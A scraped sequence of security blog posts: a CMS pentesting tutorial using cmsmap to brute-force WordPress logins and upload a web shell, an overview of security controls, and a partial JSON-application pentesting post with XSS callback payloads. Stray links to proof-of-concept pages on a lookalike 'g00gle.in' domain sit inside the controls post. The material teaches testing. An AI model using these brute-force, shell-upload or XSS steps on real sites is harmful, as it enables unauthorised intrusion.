<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvuuZF8WntcFDxQ1o0cCkOhsOSqeRHim_bTaDxb6Sth8mU63ZfhT5WVW5dFEtfjBYTGHu0gq1Zf4Ux6WHXx1ekTPuuXwPV5dOiq5I1ghyn1gS1EJ8BRTriNold9S2mYDliedXZQ83lcwc/s1600/Screenshot+2018-11-24+at+4.54.22+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="382" data-original-width="649" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvuuZF8WntcFDxQ1o0cCkOhsOSqeRHim_bTaDxb6Sth8mU63ZfhT5WVW5dFEtfjBYTGHu0gq1Zf4Ux6WHXx1ekTPuuXwPV5dOiq5I1ghyn1gS1EJ8BRTriNold9S2mYDliedXZQ83lcwc/s640/Screenshot+2018-11-24+at+4.54.22+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibSX1SETO7QgDY8sPlJjvbnmHx1UZSMCVlOnbSspsidygxoaJ1zxaLkl37z7XSUCcniqgsLWw4y-R6lUhKVJVKZwwJNER7mZ4HfILEehF9notGybVPdJFnA_QrP6lhZ-rV8hUiUZWcTJg/s1600/Screenshot+2018-11-24+at+4.57.05+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="381" data-original-width="652" height="372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibSX1SETO7QgDY8sPlJjvbnmHx1UZSMCVlOnbSspsidygxoaJ1zxaLkl37z7XSUCcniqgsLWw4y-R6lUhKVJVKZwwJNER7mZ4HfILEehF9notGybVPdJFnA_QrP6lhZ-rV8hUiUZWcTJg/s640/Screenshot+2018-11-24+at+4.57.05+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Personally I contact with many AMCs ethically regarding this issue and they were able to fix this immediately within a few days and hours due to very criticality of the vulnerability :) In the response they appreciated my efforts.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
</div>
Narendra Bhatihttp://www.blogger.com/profile/07150714543762295098noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-81431593431187396862018-11-05T23:19:00.000+05:302019-09-13T13:10:31.423+05:30Pentesting CMS : Wordpress Joomla Drupal<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwg_vZqQgfFnDQRO4gab_wXIwRugQ6NDaDtGGZcw4vzjcjP3yRaD1W2vVKLVrZ-cKuvysWXdbuc_lEAzFQEytkb9jANMeuMV_H7weFb4TrJLcIDmgZel6D_ThVK8FNDkki_L67ZVcFUJw/s1600/cms.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="117" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwg_vZqQgfFnDQRO4gab_wXIwRugQ6NDaDtGGZcw4vzjcjP3yRaD1W2vVKLVrZ-cKuvysWXdbuc_lEAzFQEytkb9jANMeuMV_H7weFb4TrJLcIDmgZel6D_ThVK8FNDkki_L67ZVcFUJw/s400/cms.JPG" width="400" /></a></div>
<br />
Hello All, Today we will see how we can pentesting CMS like wordpress, drupal, joomla etc.</div>
<br />
<div style="text-align: left;">
Sometimes we might get CMS based website or application to do perform VAPT. Pentesting CMS is just like a head ache, Because in CMS the back-end codes are mostly pre-defined as CMS nature and behaviour, Any one can download the CMS package and create his website or blog in seconds without knowing any knowledge of coding and extra skills.</div>
<br />
<div style="text-align: left;">
So finally while Pentesting CMS we have to fight with the pre-define codes or you can Static code which id designed by experts like wordpress, drupal, joomla etc.</div>
<br />
<div style="text-align: left;">
First of all we have to map our target for structured view. It will better if we crawl our target using different tools like Burp will be the great option, Apart from this we can use "dirb" present in kali linux which will brute force the URI and directory name for possible existence.</div>
<br />
<br />
<a name='more'></a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrt_GmVT23gpU1e4panmAriMN3B5iUBUFVdpCsj67I8HsfbnTRtboR_dlwNmnxSfc2NOq9AR430WSy7ZUQRfg9Wfbi4EeevEOP5crO29qZQ382bg0XBPr5raYt4GubtDoM9wYObFdddwM/s1600/Crawl.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrt_GmVT23gpU1e4panmAriMN3B5iUBUFVdpCsj67I8HsfbnTRtboR_dlwNmnxSfc2NOq9AR430WSy7ZUQRfg9Wfbi4EeevEOP5crO29qZQ382bg0XBPr5raYt4GubtDoM9wYObFdddwM/s640/Crawl.png" width="640" /></a></div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM61Al8umXmUqb8ugQk170W6nnrgA6D3KmXByZKOUI87c48VyiUsO2aV7Rx3FHBEOSRzIVa1XUuJ9EHh34gLkQQKgTujfgPpyxWIi-5ZJQm3z20Rva7VLqyo-MolQEEc74P3f4Dk2Qn64/s1600/Dirb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM61Al8umXmUqb8ugQk170W6nnrgA6D3KmXByZKOUI87c48VyiUsO2aV7Rx3FHBEOSRzIVa1XUuJ9EHh34gLkQQKgTujfgPpyxWIi-5ZJQm3z20Rva7VLqyo-MolQEEc74P3f4Dk2Qn64/s640/Dirb.png" width="544" /></a></div>
<br />
<br />
<br />
<br />
After crawling we can look out for the interesting thing, Now in CMS enumeration is the most important part because as per the CMS default folder and page name will be the same, But it might be possible that developer had also included or added some kind of custom codes according to their need. So looking into the these details might expose sensitive information.<br />
<br />
Crawling is also important if we are testing some other CMS like Modx, Exponent , Wolf CMS etc. Because the standard tools are only available for top level CMS like Wordpress, Joomla, Drupal Etc.<br />
<br />
<br />
<br />
Now we are moving to the automated testing of CMS using different tools and scripts.These are many tools available which can help us to quickly look in to existed vulnerability in CMS. According to top CMS there are different tools available for WordPress, Drupal, Joomla. Using them separately will be a head ache, So recently a new tools has released called "CMSMAP" which have all of 3 tools functionality in itself.<br />
<br />
Currently we are assuming that our target domain is - <strong>http://192.168.65.131/wordpress/</strong><br />
<br />
There are many option available in this tool, I will try to summarise them all.<br />
<br />
./cmsmap.py -t http://192.168.65.131[target]/wordpress<br />
<br />
This command will perform all scan like getting version, existing plugins, directory listing bugs etc.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg68FfFd5pSgc2HCzI5JRn4c5JLZWSbfgp-x0xBS1H2tkZkQuBKDE2_95uEAtGQTX78URgqnL-JeEllc0KY56MAwn37ai6hCYsr7QT9OELU0AdQ091gvjXpBP9RUPVLehFtbdguOPjekio/s1600/cms-map-simple.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg68FfFd5pSgc2HCzI5JRn4c5JLZWSbfgp-x0xBS1H2tkZkQuBKDE2_95uEAtGQTX78URgqnL-JeEllc0KY56MAwn37ai6hCYsr7QT9OELU0AdQ091gvjXpBP9RUPVLehFtbdguOPjekio/s640/cms-map-simple.png" width="640" /></a></div>
<br />
You can also use the an another tool which we do similar test like given.<br />
<br />
After getting this information, Our first approach should concentrate on version of the CMS and the installed plugin.<br />
<br />
If the version is older then present and if it was vulnerable by some kind of vulnerabilities which can help you out to get some meal.<br />
<br />
Some times due to some security plugins this scanner will not work and stop after execution, So you need to give user agent value by yourself using --user-agent ( look for the other option as well )<br />
<br />
For example i would be suggest you <a href="http://websecgeeks.com/wolf-cms-arbitrary-file-upload-to-command-execution/" target="_blank">this post</a>, That was one of my finding . Suppose while scanning you fingered out that Wolf CMS Version Is 0.8.2, Then you can look/google for his ready-made exploit or vulnerability like this.<br />
<div style="text-align: center;">
https://www.exploit-db.com/exploits/38000/</div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIbzh3BD8qT6_WSQCO03YNjY4QscCADaE9UzBB943hDBzTZk5tcyBKpMGdQdg97U0edvOfBusKg9gtBvdlKysFhn-5gyHqbBR9Ps7l68flhedRTg2Bb8nU8gk_faBBc6gZUg-YGqyKADY/s1600/eXPLOIT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIbzh3BD8qT6_WSQCO03YNjY4QscCADaE9UzBB943hDBzTZk5tcyBKpMGdQdg97U0edvOfBusKg9gtBvdlKysFhn-5gyHqbBR9Ps7l68flhedRTg2Bb8nU8gk_faBBc6gZUg-YGqyKADY/s640/eXPLOIT.png" width="640" /></a></div>
<br />
<br />
These types of exploits have step by step information which you can use to exploit your target. Keep in mind the exploit can be of anything like CMS Version, Theme/Module/Extension, Third Party App Etc. You have to look into every details for the possible exploit.<br />
<br />
<br />
<br />
Admin panel would be a great place to get some meal. Every CMS have his default location for admin panel like wordpress cms hace site/wp-login.php like others.If you didn't find any admin panel then it might possible that developer has create some smart move against attacker, So now we can also try to brute for admin location using "Dirbuster" and Burp.<br />
<br />
For demonstration i had used 5 location as payloads in burp, Here is the preview<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcZ1DdDYtj4QvUjOERl91lNyBKWG_CKPNXysoPP6du-vVA2D7_ENku1K2cE9zsNiTvgjGdzhpNFRHwHD_yl13nd7pwdK7kIMO-DtMsxUV8LYBiZVo9vShuY7q5ahiUgCYaBLNoBJGud8I/s1600/admin-find.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcZ1DdDYtj4QvUjOERl91lNyBKWG_CKPNXysoPP6du-vVA2D7_ENku1K2cE9zsNiTvgjGdzhpNFRHwHD_yl13nd7pwdK7kIMO-DtMsxUV8LYBiZVo9vShuY7q5ahiUgCYaBLNoBJGud8I/s640/admin-find.png" width="640" /></a></div>
<br />
<br />
<br />
So we can try to find out the admin panel, Now we have to guess/enumerate the username for brute forcing.<br />
<br />
Most probably you will see that many cms provide Post Time & Post By Link on top of the every page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO8ecE6OroPlRxyMyLt6NmxgrWNnLLUcWIGYLU_-J-qNn_YWkjkfEYKSExMRD8Eu5vCxrd6stoBforff7DqQUojKVpFIJCbugP6GGna84nbA8lAQvb4igyOc7o1nG08guQzjkQj0do_84/s1600/target-user.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO8ecE6OroPlRxyMyLt6NmxgrWNnLLUcWIGYLU_-J-qNn_YWkjkfEYKSExMRD8Eu5vCxrd6stoBforff7DqQUojKVpFIJCbugP6GGna84nbA8lAQvb4igyOc7o1nG08guQzjkQj0do_84/s1600/target-user.png" /></a></div>
<br />
<br />
When you will click on that Name it will send you to the author page. In url of the same page you can found out the username in front of /author/ Ex. the user name of this site is "iamthetargetuseradmin"<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjihwT27wloVdM2o2QukFfsNIlHjN_Mw2VQK7ceUHM0GZ9dXNB1FGxDjDQnXfzBbCJ2P9PwjgToxehC1Efbp8r2DT1B4ITFnkzgrdDfO3Y3nOPdmQo_-_vlWTQe_JzPlfqoeH_nDAeKmTU/s1600/target-url.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjihwT27wloVdM2o2QukFfsNIlHjN_Mw2VQK7ceUHM0GZ9dXNB1FGxDjDQnXfzBbCJ2P9PwjgToxehC1Efbp8r2DT1B4ITFnkzgrdDfO3Y3nOPdmQo_-_vlWTQe_JzPlfqoeH_nDAeKmTU/s640/target-url.png" width="640" /></a></div>
<br />
<br />
This url value can be change by developer so this an alternate option to found out the username of our target along with you can CMSMap which we seen in top will also helpful to found the username as well.<br />
<br />
This is a wordpress cmc example, But if you are facing other cms then you can look for similar way.<br />
<br />
Now its time to brute the admin panel. For brute forcing you can different tools, I mostly preferred CMSMAp and Burp Suite.<br />
<br />
I am showing the example of CMSMap.<br />
<br />
<strong>./cmsmap.py -t http://192.168.65.131/wordpress/ -u admin -p /root/wpcrack.txt</strong><br />
<br />
This command will by default take the default login page of wordpress and start brute forcing as per the option,<br />
<br />
-i standforusername/usernamelist & -p passwordlist<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgclMP1J4iQ_JrFQxcYH2cqPuITCWjkiAE5uRUHsWMMjE7L1ELtQXWGwvpeH81Zs_nfvG-SNNv8fvFQtvK2smtBtHMjls5zOV0Ds_IgFz_tcZEpxuEWJFIUnY05K1lM2kZ7ADc4KR9nY5s/s1600/cms-crack-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgclMP1J4iQ_JrFQxcYH2cqPuITCWjkiAE5uRUHsWMMjE7L1ELtQXWGwvpeH81Zs_nfvG-SNNv8fvFQtvK2smtBtHMjls5zOV0Ds_IgFz_tcZEpxuEWJFIUnY05K1lM2kZ7ADc4KR9nY5s/s640/cms-crack-1.png" width="640" /></a></div>
<br />
<br />
As you can in this screen shot, I already created a txt file with some password [ username is admin & password is also admin for demonstration] . Now you can see that CMSMap failed to found valid credentials! Because CMSMap by default using "xmlrpc" file which is used by Wordpress for API calls to perform brute forcing.<br />
<br />
In my example given wordpress is not using "xmlrcp" is depend on the functionality of the wordpress like wordpress popular plugin called "jetpack" use xmlrcp to be enable for working perfectly.<br />
<br />
So we have to instruct CMSMap to do not use xmlrcp for brute forcing.So we can an option "--noxmlrpc" for this .Example is given below<br />
<br />
<strong>./cmsmap.py -t http://192.168.65.131/wordpress/ -u admin -p /root/wpcrack.txt --noxmlrpc</strong><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsWUDESM3aolQO7C0inr4fzeH7oQ8SdzOtHhls5ZlD_ZPsjmO8qxo4GnT1cDy1FGC8dkz7CtYy8U92RrZc08kYbYwZqXGvQjP7DdQLCB94kKk6Re4TQn36ylegXl7pzrP9eppQxcLbPZo/s1600/wp-crack-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="56" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsWUDESM3aolQO7C0inr4fzeH7oQ8SdzOtHhls5ZlD_ZPsjmO8qxo4GnT1cDy1FGC8dkz7CtYy8U92RrZc08kYbYwZqXGvQjP7DdQLCB94kKk6Re4TQn36ylegXl7pzrP9eppQxcLbPZo/s640/wp-crack-2.png" width="640" /></a></div>
<br />
<br />
We found valid credentials, Now CMSMap will ask you for the upload a shell, After pressing "Y" it will try to upload a custom shell in writable theme pages. If he succeed it will prompt you with the Shell URL.<br />
<br />
Given example might not work on most cases, Because mostly theme may not be writeable by an admin.So you can try the 2nd option. Just try to find a vulnerable plugin/module/extension depends on cms which kind of third party tools/script it accept in exploit-db.com or somewhere else which store vulnerable applications exploit for other pentesters/hackers and upload it to target website after login, Then follow the steps given in exploit details. Keep in mind before uploading the vulnerable plugin make sure that it is also compatible with version which you are pentesting right now, because it might cause your target site down or unavailable due to non-compatibility.<br />
<br />
Here is some useful information which might useful while pentesting wordpress, drupal & joomla<br />
<br />
Wordpress<br />
Default files: “readme.html”, “license.txt”<br />
Configuration file location: [examplesitefortesting.com]/wp-config.php<br />
Administrator login location: [examplesitefortesting.com]/wp-login.php<br />
Plugin location: [examplesitefortesting.com]/wp-content/plugins<br />
<br />
Drupal<br />
Default files: “CHANGELOG.txt”, “UPGRADE.txt”, “README.txt”<br />
Configuration file location: [examplesitefortesting.com]/sites/default/settings.php<br />
Plugin location: [examplesitefortesting.com]/?q=[pluginname]<br />
<br />
Joomla<br />
Default files: “joomla.xml”, “README.txt”, “htaccess.txt”<br />
Configuration file location: [examplesitefortesting.com]/configuration.php<br />
Administrator login location: [examplesitefortesting.com]/administrator<br />
Plugin location: [examplesitefortesting.com]/index.php?option=[pluginname]<br />
<br />
<br />
<br />
If you have any other idea or something to improve kindly comment below. :)<br />
<br /></div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-16089201461096562622018-07-04T04:40:00.014+05:302024-02-11T20:52:00.714+05:30Information Security Controls<div dir="ltr" style="text-align: left;" trbidi="on">
Information Security controls is mechanism or a set of rules to to
decrease the risk in terms of vulnerability , internal and external threads
etc. Information security also covered the other aspects of an organisation
like Computer Security , Physical Security , Network Security , Business
Continue Planning , Disaster Recvery Planning, Counter Measures With Existing
Or Future Attacks.<br />
<br />
These controls facilities an organisation to keep his Information Confidentiol
from external or internal attacks, Its maintain and help organisation to keep
running their system after any attacks.<br />
<br />
Its also proview you an view that how much your Information secure.<br />
<br />
<br />
<br />
Here are some important thing which you should be covered under Information
Security Controls.<br />
<ul>
<br />
<li>
This rule comes under the physical security , In this set each and every
person should be pass into the organisation by well managed physical
security which should be monitor properly to identify the unknown
Intruder.
</li>
<br />
<li>
Every information which generated or produce in an Organisation should be
properly backup time to time to prevent data loss due to hacking attempt
and system failure, Its also recommended to create an extreme back and
restore system which should run and managed properly.
</li>
<br />
<li>
Incident Response should be there to perform an immediate reply for any
incident which can be anything like , Fire attack , physical attacker or
any technical hacking attack.
</li>
<br />
<li>
Keep you employee Train And Educated about Any incident its also covered
in Information Security Controls , If your employee is well trained about
these types of situation then there will be less chance of any loss in an
organisation.
</li>
<br />
<li>
Log monitoring Must be in organisation to identify the Inside and outsider
attack before the incident happened , Many organisation use Log Monitoring
for their web application and internal system , Incoming and outgoing
traffic.
</li>
</ul>
<br />
<br />
<div style="text-align: center;">
<strong
>Information security controls are mainly Devided in 7 Categories</strong
>
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmTaLb4KXYIwEJDWH6bLkmaK4EvP3vmao7jjkIxloZhXbzT-BKVczBAkMjlIK7PI3gwliGeKjVhmXusPGsqiieTcfA3-nQOGlJm-9yaAbXzY-sI9wqvVcnX5-u3JNBogpDwmXjODJeNgE/s1600/enterprise_security_1.jpg"
imageanchor="1"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
height="314"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmTaLb4KXYIwEJDWH6bLkmaK4EvP3vmao7jjkIxloZhXbzT-BKVczBAkMjlIK7PI3gwliGeKjVhmXusPGsqiieTcfA3-nQOGlJm-9yaAbXzY-sI9wqvVcnX5-u3JNBogpDwmXjODJeNgE/s320/enterprise_security_1.jpg"
width="320"
/></a>
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3iaZqYhwYmQFYVjM1vwuP_kt8L29VmuENll-u8HqfkMDT6rzM9ucJSxMJrnmEEwFNL1ulaaDRFO0XQXSlvunx8H96HeNiboF6ShN6rADToeljUAl9ffelzQTybAs-jzPb0vuCPIC6nO4/s1600/enterprise_security_1.jpg"
imageanchor="1"
style="margin-left: 1em; margin-right: 1em;"
><img
border="0"
height="392"
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3iaZqYhwYmQFYVjM1vwuP_kt8L29VmuENll-u8HqfkMDT6rzM9ucJSxMJrnmEEwFNL1ulaaDRFO0XQXSlvunx8H96HeNiboF6ShN6rADToeljUAl9ffelzQTybAs-jzPb0vuCPIC6nO4/s400/enterprise_security_1.jpg"
width="400"
/></a>
</div>
<br />
<br />
1. Network Security<br />
<br />
<div style="text-align: left;">2.Access Control</div>
<br />
<div style="text-align: left;">3. Security Management</div>
<br />
<div style="text-align: left;">4.Physical Security</div>
<br />
<div style="text-align: left;">5.Business Continuity & DR Planning</div>
<br />
<div style="text-align: left;">6.Operations Security</div>
<br />
<div style="text-align: left;">7.Application/System Security</div>
<br />
<div style="text-align: left;"></div>
<br />
<div style="text-align: left;">
<strong>1.</strong> <strong>Network Security Controls</strong>
</div>
<br />
<div style="text-align: left;">
Network Security Controls if the first or the important part for an
organisation because this part start from bottom line or you can say that
this is the heart of any Company . Network Security Covers his internal
devices like routers , Switcher and other devices which is very important
for an organisation to continue his work.
</div>
<br />
<div style="text-align: left;">
Setting Up firewall and UTM are recommended for every organisation to keep
controls on their Network Environment .
</div>
<br />
<div style="text-align: left;"></div>
<br />
<div style="text-align: left;">
<strong>2.</strong> <strong>Access Controls</strong>
</div>
<br />
<div style="text-align: left;">
Access controls Covers the right or privilege for each and every user which
is under an organisation and internal employees , Access controls is comes
as Authorization.This is very important that every user his limited user
privilege and right to continue his work , Like an employee for any
organisation should not able to access administrator level access things
action Like changing some one password , access to internal resources , Etc.
</div>
<br />
<div style="text-align: left;">
<strong>3.</strong> <strong>Security Management</strong>
</div>
<br />
Security management is the classification of an organization assets
inventory which should be followed by proper guidelines , rules set and
documentation.Many organisation create Security Policies which should followed
by his employee. Like no employee can bring any storage devices in
office primasius which decrease the risk of insider data theft.<br />
<br />
<strong>4.</strong> <strong>Physical Security</strong><br />
<br />
Physical Security its also an important factor for an organisation to identify
an unknown intruder or attacker, decrease the risk of business loss like fire
attack , earth quake or any natural or unnatural attack.<br />
<br />
Many things are comes under the Physical Security Like , CCTV Cameras,
Security Guards , Fire Preventions Systems<br />
<br />
Entry Gates authentication such like Finger Print Scanner or Eye Detection
Mechanism.<br />
<br />
<br />
<br />
<strong>5. Business Continuity & DR Planning</strong><br />
<br />
Business Continuity & DR Planning allow an organisation to keep running
his business regularly if he is/was under attack , Data loss or system
failure.<br />
<br />
This control managed the whole data of an organisation which automatically
back up time by time , to restore in case of data loss or any hacking
attack.<br />
<br />
<br />
<br />
<b>6. Operations Security</b><br />
<br />
OPSEC ( Operation Security ) Covers unwanted or unintended risk which can be
performed against us,OPSEC maintain these all things to take care that is
there any information can be used against us or not.<br />
<br />
<br />
<br />
<strong>7.Application/System Security</strong><br />
<br />
Application/System Security is an major control for an organisation to
maintain his on-line identify safe and confidential. This controls covers that
we should maintain our Application/System Security by different technologies
like Firewall , IPS , SIEM and Other Log Monitoring Systems.<br />
<br />
This will help an organisation to keep them self secure before or while the
attack.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="text-align: left;">
<br />
</div>
<br />
<div style="text-align: center;">
<br />
</div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
</div>
<p>
<a href="https://g00gle.in/samesitebypassbingandroid/poc.php">linkbingtext</a><br><br><br><br><br>
<a href="https://g00gle.in/samesitemsstart/poc.php">msstart</a><br><br><br><br><br>
<a href="https://g00gle.in/samesitemsbing/poc.php">MSBing</a><br><br><br><br><br>
<a href="https://g00gle.in/samesitetemp/poc.php">temp</a><br><br><br><br>
<a href="https://g00gle.in//ss.php">ss</a><br><br><br><br><br><br>
<a href="https://g00gle.in//aa.php">aa</a><br><br><br><br><br><br>
<a href="https://g00gle.in/check.html">check</a><br><br><br><br><br><br>
<a href="https://g00gle.in/check.php">Auto</a><br><br><br><br><br><br>
<a href="https://g00gle.in/samesitebypassyahooandroid/poc.php">YY</a><br><br><br><br><br><br>
</p>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-67503095482891013602018-07-03T04:31:00.000+05:302019-09-13T12:55:54.093+05:30Attacking JSON Application : Pentesting JSON Application<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
Hello all, Its quite long time i have dosn`t updated my blog. So here we go.<br />
<br />
<br />
<br />
Today we will see how we can pentest JSON Web Application.<br />
<br />
Note- Some of the methods are taken from third party resources and some are presented as my personal experience.<br />
<br />
<strong>First What Is <a href="http://www.json.org/">JSON </a>According To JSON Website.</strong><br />
<br />
<b>JSON</b> (JavaScript Object Notation) is a lightweight data-interchange format. It is easy for humans to read and write. It is easy for machines to parse and generate. It is based on a subset of the JavaScript Programming Language, Standard ECMA-262 3rd Edition - December 1999<br />
<br />
"In a lemon language JSON is typically used Javascript to pass the parameter". Like Below HTTP Request.<br />
<br />
GET /site/getuserinfo=narendrabhati HTTP/1.1<br />
Host: websecgeeks.com<br />
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0<br />
Content-Type: application/json;<br />
<br />
<a name='more'></a><br />
<br />
The Response will typically look like this<br />
<br />
HTTP/1.1 200 OK<br />
Cache-Control: private<br />
Content-Type: application/json; charset=utf-8<br />
Server: Microsoft-IIS/7.5<br />
X-AspNetMvc-Version: 4.0<br />
X-AspNet-Version: 4.0.30319<br />
X-Powered-By: ASP.NET<br />
Date: Wed, 21 Oct 2015 10:15:04 GMT<br />
Content-Length: 72<br />
<br />
{"name":"narendrabhati","email":"narendra.bhati@websecgeeks.com","website":"<br />
<br />
http://websecgeeks.com"}<br />
<br />
==========================================================================<br />
<br />
Now i am directly moving to the Main Part which is different way to Pentest JSON Application.<br />
<br />
<strong>1. Brute Force</strong><br />
<br />
Brute forcing or no limit for attempts like Authentication form is the basic one which the traiditional attack which we check in all web application as well as JSON Application.<br />
<br />
If you feel brute force protection/login attempt or captcha protection then you can <a href="http://websecgeeks.com/bypass-brute-force-protection-login-attempt-protection-captcha-bypass/" target="_blank">refer my this post</a><br />
<br />
<br />
<br />
<b>2. XSS</b><br />
<br />
XSS in JSON application is as simple as we do pre-application. Basically the parameter which we are passing into the application is sended by javascript as array and response would be the also same.So we have to strip out our payload from the array.<br />
<br />
Normally there is prameter in JSON Application called "callback" which was vulnerable recently.You can find the issue <a href="https://github.com/FriendsOfSymfony/FOSJsRoutingBundle/issues/112">here</a><br />
<br />
The payload should be like this URI<br />
<br />
<strong>/site/getinfo?callback='alert('XSS');//</strong><br />
<br />
<strong>/site/getinfo?callback="alert('XSS');//</strong><br />
<br />
Payload depends on the tag that there is a single quote used or double quote<br />
<br />
In the response the reflected value will be look like this<br />
<br />
<strong> {"callback":""alert(1)//1111"}</strong><br />
<br />
If the value not filter or sanitized the payload will be executed and comment our the rest of the section.<br />
<br />
The example will look like this:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIJCtWOltejQrs8oOWNtWr-LOuQ3-6H-4A9mg4w5w8oACQLA55V3qRBOYWLnFCzDSkozydgMclOgStQtr0pVJFI7dYW-HvrAbf73xReNAmO9xoF-9lusab3qTheJf2_P-IqPel8eAktMg/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIJCtWOltejQrs8oOWNtWr-LOuQ3-6H-4A9mg4w5w8oACQLA55V3qRBOYWLnFCzDSkozydgMclOgStQtr0pVJFI7dYW-HvrAbf73xReNAmO9xoF-9lusab3qTheJf2_P-IqPel8eAktMg/s640/1.png" width="640" /></a></div>
<br />
<br />
<br />
<strong>3. JSON Hijacking.</strong><br />
<br />
A Detailed Information Is Present Here - <a href="http://www.websecgeeks.com/2016/04/json-hijacking.html" target="_blank">http://www.websecgeeks.com/2016/04/json-hijacking.html</a><br />
<br />
<strong>4. SQL Injection</strong><br />
<br />
SQL injection is a common vulnerabilities which found in applications, SQL Injection in JSON is same as Normal applications.<br />
<br />
My suggestions is to check all the endpoint calls to look this, Because most of developers forget to add sanitization on the same<br />
<br />
Here is the example of JSON endpoint SQL Injection<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
